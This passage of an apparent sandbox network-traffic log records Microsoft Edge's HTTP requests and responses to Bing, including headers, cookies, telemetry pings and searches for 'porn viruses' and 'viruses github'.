Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=1209600
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 3541
Date: Sat, 05 Oct 2024 16:05:40 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144340.184ec719
GET

https://www.bing.com/th?id=OSK.b27b03702ef0e489faa6e354d6ec7c12&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.b27b03702ef0e489faa6e354d6ec7c12&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 5265
Date: Sat, 05 Oct 2024 16:05:41 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144341.184ec7cc
GET

https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
ect: 4g
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
Upgrade-Insecure-Requests: 1
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=0
Content-Encoding: br
Expires: Sat, 05 Oct 2024 16:04:49 GMT
Vary: Accept-Encoding
X-EventID: 670163dd24e349b69be2fd3c6e8a3c0c
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-5JRgmuEXxj2VXPa0sueWakJuhdXrjQxejgGmHFSwXH8='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingserp&ndcParam=QWthbWFp"}]}
Report-To: {"group":"crossorigin-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingserp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0,"include_subdomains":true}
Cross-Origin-Embedder-Policy-Report-Only: 'require-corp; report-to=\"crossorigin-errors\"'
Cross-Origin-Opener-Policy-Report-Only: 'same-origin; report-to=\"crossorigin-errors\"'
Date: Sat, 05 Oct 2024 16:05:49 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Connection: Transfer-Encoding
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144349.184ed200
Set-Cookie: bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; Domain=.bing.com; Path=/; Expires=Sat, 05 Oct 2024 18:05:49 GMT; Max-Age=7200; Secure
GET

https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2214%22}]

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2214%22}] HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144349&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:51 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144351.184f0f0c
POST

https://www.bing.com/rewardsapp/ncheader?ver=50184609&IID=SERP.5051&IG=1D2FDF991A984BF98138E4B738C9DC15

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /rewardsapp/ncheader?ver=50184609&IID=SERP.5051&IG=1D2FDF991A984BF98138E4B738C9DC15 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 4
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-type: application/x-www-form-urlencoded
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: _C_Auth=; MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144350&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/1.1 200 OK

Content-Length: 838
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate
Content-Encoding: gzip
Expires: -1
Pragma: no-cache
Vary: Accept-Encoding
X-EventID: 670163df86a349919b715927467221a6
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-bgPu05OU8pueq6Uph37bguUEYynHflZLBq2nEQi8cMQ='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-Ceto-ref: 670163df86a349919b715927467221a6|AFD:670163df86a349919b715927467221a6|2024-10-05T16:05:51.272Z
Date: Sat, 05 Oct 2024 16:05:51 GMT
Connection: keep-alive
Set-Cookie: _C_ETH=1; expires=Fri, 04 Oct 2024 16:05:51 GMT; domain=.bing.com; path=/; secure; httponly
Set-Cookie: _C_Auth=
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144351.184f1b05
GET

https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350331%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22609%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350332%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350335%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1728144350543%2C%22Name%22%3A%22OrgId%22%2C%22FID%22%3A%22NoSignInAttempt%22%7D%2C%7B%22correlationId%22%3A%22670163dd24e349b69be2fd3c6e8a3c0c%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1728144350571%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%22670163dd24e349b69be2fd3c6e8a3c0c%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1728144350571%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2219041%22%5D%2C%22isWin11OrHigher%22%3A%22false%22%2C%22fullOsBuild%22%3A%2210.0.19041%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350647%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144350712%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350331%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22609%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350332%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350335%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1728144350543%2C%22Name%22%3A%22OrgId%22%2C%22FID%22%3A%22NoSignInAttempt%22%7D%2C%7B%22correlationId%22%3A%22670163dd24e349b69be2fd3c6e8a3c0c%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1728144350571%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%22670163dd24e349b69be2fd3c6e8a3c0c%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1728144350571%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2219041%22%5D%2C%22isWin11OrHigher%22%3A%22false%22%2C%22fullOsBuild%22%3A%2210.0.19041%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350647%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144350712%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
